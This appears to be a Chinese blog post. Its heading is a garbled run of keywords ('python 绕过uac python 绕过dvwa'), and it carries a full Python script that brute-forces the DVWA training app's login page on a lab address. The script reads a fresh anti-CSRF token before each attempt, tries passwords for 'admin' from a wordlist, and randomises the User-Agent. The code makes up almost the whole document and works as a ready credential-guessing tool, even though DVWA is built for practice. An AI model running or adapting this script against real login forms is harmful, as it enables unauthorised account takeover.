效果

python 绕过uac python 绕过dvwa_python 绕过uac

源码

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time    : 2021/9/3 13:01
# @Author  : AA8j
# @Site    : 
# @File    : test2.py
# @Software: PyCharm

import re

import requests
from fake_useragent import UserAgent


def post(url, headers, data, time):
    """Send one POST through the shared session and return the response.

    The request goes through the module-level ``req`` session, which is
    created in the ``__main__`` block, so this function only works once
    that session exists. Reusing one session keeps server-set cookies
    across calls.

    Args:
        url: Address to post to.
        headers: Request headers to send.
        data: Form fields to send (may be empty).
        time: Timeout passed to requests (the name is the author's; it
            is a timeout value, not the ``time`` module).

    Returns:
        The response object, with its text encoding forced to UTF-8.
    """
    resp = req.post(url, data=data, headers=headers, timeout=time)
    # Decode the body as UTF-8 regardless of what the server declares.
    resp.encoding = 'utf-8'
    return resp


def get_token(html):
    """Return the value of the hidden ``user_token`` field found in *html*.

    The match is literal: single-quoted attributes in exactly this order
    and spacing. The first occurrence wins.

    In DVWA this field is the anti-CSRF token of the login form. Any
    client can request a fresh form before each submission, so the token
    ties a submission to a session but does not limit how many logins a
    client may try; that limit has to come from server-side lockout or
    rate limiting.

    Raises:
        AttributeError: If the field is not present in *html* (the
            search yields ``None``).
    """
    found = re.search(
        r"<input type='hidden' name='user_token' value='(.*?)' />",
        html,
    )
    # ``found`` is None when the page has no such field; .group then raises.
    return found.group(1)


def read_password(path):
    """Read *path* and return its lines as a list, newline removed.

    Every line of the file yields one entry, in file order. Blank lines
    are kept as empty strings, and a final line without a trailing
    newline is returned unchanged. The file is opened in text mode with
    the platform's default encoding.
    """
    with open(path, 'r') as handle:
        # Keep only the text before the line terminator, if there is one.
        return [line.partition('\n')[0] for line in handle]


if __name__ == '__main__':
    # One session for the whole run; post() reaches it through the global
    # name ``req``, so this name must not change.
    req = requests.session()

    # A random User-Agent string is picked once and reused for every request.
    HEADERS = {'User-Agent': UserAgent().random}

    # Per-request timeout, passed straight to requests.
    TIMEOUT = 3
    # DVWA login page of a lab instance on a private address, over plain HTTP.
    URL = 'http://192.168.8.46/DVWA-2.0.1/login.php'

    # Seen from the server, each entry of the list produces two POSTs to
    # login.php back to back on one session with a constant User-Agent.
    # That request pattern is what login rate limiting, account lockout
    # and failed-login alerting are meant to catch; the per-form token
    # does not slow it down.
    for candidate in read_password('./passwords.txt'):
        # Step 1: an empty POST returns the login form, from which the
        # current user_token is read.
        token = get_token(post(URL, HEADERS, {}, TIMEOUT).text)

        print(f'\r正在使用密码 {candidate.ljust(10)} 尝试登录。', end='')
        # Step 2: submit the login form together with that token.
        form = {
            'username': 'admin',
            'password': candidate,
            'Login': 'Login',
            'user_token': token,
        }
        reply = post(URL, HEADERS, form, TIMEOUT)
        body = reply.text
        # Only the response length and elapsed time are printed; the
        # script itself does not decide whether a login succeeded.
        print('响应长度:', len(body), end='。')
        # Alternatively, redirects could be left unfollowed and the
        # redirect location used to tell whether the login succeeded.
        print('响应时间:', reply.elapsed)